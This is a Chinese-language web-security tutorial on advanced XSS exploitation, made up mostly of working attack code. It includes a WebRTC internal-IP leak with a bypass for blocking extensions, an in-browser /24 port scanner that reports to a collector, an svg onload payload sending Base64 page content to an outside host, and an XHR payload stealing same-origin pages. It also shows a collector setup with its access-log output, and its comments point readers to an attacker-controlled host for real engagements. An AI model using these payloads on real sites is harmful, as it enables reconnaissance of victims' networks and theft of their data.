XSS的高级攻击用法

XSS的一些其他用法

攻击客户端，通过 WebRTC 获取内网 IP，并对同一 /24 网段做简单端口扫描（注意：较新的浏览器默认用 mDNS 名称代替内网地址作为 ICE 候选，此时脚本拿不到内网 IP，需在目标浏览器上验证）

xss.js（下面的 xss.html 以 xss_net.js 的文件名引用它，保存时注意文件名一致）

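// Exfiltration channel: report (ip, port) back to the collector by loading a hidden <img>.
// The collector is the `python -m SimpleHTTPServer` listener on port 8000; it logs every
// request line, so the result is read straight from its access log.
// 127.0.0.1 only works when testing on the same machine — the VICTIM's browser resolves
// this address, so replace it with an attacker-controlled host for a real engagement.
var COLLECTOR_URL = "http://127.0.0.1:8000/";
var TagName = document.getElementsByTagName("body")[0];

function post_data(ip, port) {
  // Encode both values. The scanner passes regex-matched IPv4 strings today, but a
  // stray "&" or "#" from any other caller would otherwise corrupt the query string.
  var url = COLLECTOR_URL + "?ip=" + encodeURIComponent(ip) +
            "&openport=" + encodeURIComponent(port);
  var img = document.createElement("img");
  img.setAttribute("src", url);
  img.setAttribute("style", "display:none");
  // Fall back to document.body in case this script was loaded before <body> existed.
  (TagName || document.body).appendChild(img);
}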

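// Extract the first dotted-quad IPv4 literal from an ICE candidate string.
// Returns null when the candidate carries none (IPv6 candidates, or browsers that
// publish host candidates as mDNS "*.local" names instead of the raw address —
// NOTE(review): current browsers appear to do this by default, so on them this
// technique yields no internal IP; verify against the target browser).
function extractIPv4(candidate) {
  var match = /([0-9]{1,3}(\.[0-9]{1,3}){3})/.exec(String(candidate));
  return match ? match[1] : null;
}

// Enumerate the local IP addresses the browser exposes through WebRTC ICE gathering.
// `callback(ip)` is invoked once per distinct IPv4 address found (host candidates and,
// when the STUN server answers, the server-reflexive/public address); duplicates are
// suppressed. Deliberately ES5 with vendor-prefixed constructors: this runs in
// whatever browser the victim happens to use.
function getIPs(callback) {
  var seen = {};

  // Resolve the constructor across vendor prefixes (Firefox / Chrome era code).
  var RTCPeerConnection = window.RTCPeerConnection
    || window.mozRTCPeerConnection
    || window.webkitRTCPeerConnection;
  var useWebKit = !!window.webkitRTCPeerConnection;

  // Bypass naive WebRTC blocking: extensions that delete the constructor on the top
  // window usually miss a freshly created same-origin iframe.
  if (!RTCPeerConnection) {
    var iframe = document.createElement('iframe');
    iframe.style.display = 'none';
    // Sandbox without allow-scripts so no content script runs inside the frame.
    iframe.sandbox = 'allow-same-origin';
    // Stop mutation-event listeners higher up from seeing the insertion.
    // NOTE(review): DOM mutation events are deprecated; on browsers that dropped
    // them these two listeners are simply inert.
    iframe.addEventListener("DOMNodeInserted", function (e) {
      e.stopPropagation();
    }, false);
    iframe.addEventListener("DOMNodeInsertedIntoDocument", function (e) {
      e.stopPropagation();
    }, false);
    document.body.appendChild(iframe);
    var win = iframe.contentWindow;
    RTCPeerConnection = win.RTCPeerConnection
      || win.mozRTCPeerConnection
      || win.webkitRTCPeerConnection;
    useWebKit = !!win.webkitRTCPeerConnection;
  }
  // If the iframe trick did not help either, report nothing instead of throwing a
  // TypeError on `new undefined(...)` and killing the rest of the payload.
  if (!RTCPeerConnection) {
    return;
  }

  // Minimal constraints for a data-only connection (legacy Chrome flag).
  var mediaConstraints = { optional: [{ RtpDataChannels: true }] };
  // Firefox ships a default STUN server (media.peerconnection.default_iceservers);
  // give Chrome the same one so a server-reflexive candidate is gathered as well.
  var servers = undefined;
  if (useWebKit) {
    servers = { iceServers: [{ urls: "stun:stun.services.mozilla.com" }] };
  }
  var pc = new RTCPeerConnection(servers, mediaConstraints);

  function handleCandidate(candidate) {
    var ip = extractIPv4(candidate);
    // Skip candidates without an IPv4 literal: the original indexed exec()'s result
    // unconditionally and threw a TypeError here on IPv6 / mDNS candidates.
    if (ip === null) return;
    if (seen[ip] === undefined) callback(ip);
    seen[ip] = true;
  }

  pc.onicecandidate = function (ice) {
    // Skip the final "gathering finished" event, whose candidate is null.
    if (ice.candidate) handleCandidate(ice.candidate.candidate);
  };
  // A data channel is enough to start ICE gathering; no media needed.
  pc.createDataChannel("");
  // Legacy callback-style createOffer; setLocalDescription triggers the STUN request.
  pc.createOffer(function (offer) {
    pc.setLocalDescription(offer, function () {}, function () {});
  }, function () {});

  // Second pass after a grace period: re-read candidates from the local SDP in case
  // onicecandidate was suppressed. localDescription is null until setLocalDescription
  // has completed, so guard the access instead of throwing.
  setTimeout(function () {
    var desc = pc.localDescription;
    if (!desc || !desc.sdp) return;
    desc.sdp.split('\n').forEach(function (line) {
      if (line.indexOf('a=candidate:') === 0) handleCandidate(line);
    });
  }, 1000);
}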

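// Simple port scan of the victim's /24, driven by the addresses WebRTC leaked.
// Hosts .SCAN_HOST_FIRST … .SCAN_HOST_LAST are probed on SCAN_PORT by loading
// http://host:port as a <script>: a host that answers HTTP at all fires `load`
// (the response does not need to be JavaScript), while a closed port or an
// unreachable host fires `error` and is silently ignored.
var SCAN_PORT = 80;        // e.g. 3306 for MySQL
var SCAN_HOST_FIRST = 10;
var SCAN_HOST_LAST = 20;

// RFC 1918 + link-local check. The original regex used unescaped dots and the
// literal "2d" (instead of 2[0-9]), so it never recognised 172.20-172.29.x.x as
// private and mis-classified public 100.x-109.x.x.x as private.
function isPrivateIPv4(ip) {
  return /^(10\.|192\.168\.|169\.254\.|172\.(1[6-9]|2[0-9]|3[01])\.)/.test(ip);
}

getIPs(function (ip) {
  if (!isPrivateIPv4(ip)) {
    // Public / server-reflexive address: nothing to scan from here.
    return;
  }
  var octets = ip.split(".");
  octets.pop();
  var prefix = octets.join(".");
  for (var host = SCAN_HOST_FIRST; host <= SCAN_HOST_LAST; host++) {
    var target = prefix + "." + host;
    var script = document.createElement("script");
    script.setAttribute("src", "http://" + target + ":" + SCAN_PORT);
    // Inline handler string: post_data receives the host and the port as text.
    script.setAttribute("onload", "post_data('" + target + "','" + SCAN_PORT + "')");
    TagName.appendChild(script);
  }
});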

xss.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">

<title>Document</title>
</head>
<body>
</body>
<!-- Local test harness that loads the scanner. The listing above is titled xss.js but
     this tag requests xss_net.js — the name here must match the file on disk.
     The tag sits after <body> so document.body already exists when the script
     looks it up at load time. -->
<script type="text/javascript" src="xss_net.js"></script>
</html>

监听接收

可以使用 `python -m SimpleHTTPServer`（Python 2，默认监听 8000 端口，与脚本中的收集地址一致；Python 3 下为 `python3 -m http.server 8000`）作为接收端，结果直接从它的访问日志中读取：
- - [14/Aug/2019 16:15:16] "GET /?ip=10.13.101.18&openport=80 HTTP/1.1" 200 -
- - [14/Aug/2019 16:15:21] "GET /?ip=10.13.101.18&openport=80 HTTP/1.1" 200 -
- - [14/Aug/2019 16:36:20] "GET /?ip=10.13.101.18&openport=80 HTTP/1.1" 200 -

攻击客户端，获取用户页面内容（受同源策略限制，XHR 只能读取与 XSS 所在页面同源的内容；跨源页面需对方通过 CORS 明确放行）

// btoa is the browser's built-in Base64 encoder. It only accepts Latin-1 characters and throws
// InvalidCharacterError on anything else (e.g. Chinese page content), so non-ASCII input must be
// UTF-8 encoded first: btoa(unescape(encodeURIComponent(s))).
// Grab the current page (same-origin policy: only content of the origin the XSS runs on is readable).
<svg/onload="document.location='http://localhost:8000/?'+btoa(document.body.innerHTML)">

//获取其他页面,配合ajax使用

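// Fetch another same-origin page with XHR and ship its body to the collector.
// Same-origin policy applies: the browser only lets this read responses from the
// origin the XSS runs on (or origins that explicitly allow it via CORS).

// Base64 for arbitrary text. btoa() only accepts Latin-1 and throws
// InvalidCharacterError on anything else (e.g. Chinese page content), so the text is
// UTF-8 encoded first. The collector decodes with the reverse:
// decodeURIComponent(escape(atob(s))), or simply UTF-8-decodes the raw bytes.
function toBase64Utf8(text) {
  return btoa(unescape(encodeURIComponent(text)));
}

// Append a hidden <img> instead of document.write(): once the page has finished
// loading, document.write() replaces the whole document and makes the attack visible.
// NOTE(review): a whole page in one GET query may exceed browser or collector URL
// length limits; chunk the payload if the collector log shows truncated requests.
function post_page(text) {
  var img = document.createElement("img");
  img.setAttribute("src", "http://localhost:8000/?" + toBase64Utf8(text));
  img.setAttribute("style", "display:none");
  document.body.appendChild(img);
}

var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
  if (xmlhttp.readyState === 4 && xmlhttp.status === 200) {
    post_page(xmlhttp.responseText);
  }
};
xmlhttp.open("GET", "test.php", true); // test.php: the page to steal
// The original also set Content-type on this GET; it carries no body, so the header was dropped.
xmlhttp.send();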

其他利用方式可参考XSS平台的配置
http://xssye.com/index.php?do=module

某CTF XSS+SSRF综合利用方式

https://www.anquanke.com/post/id/156377

web安全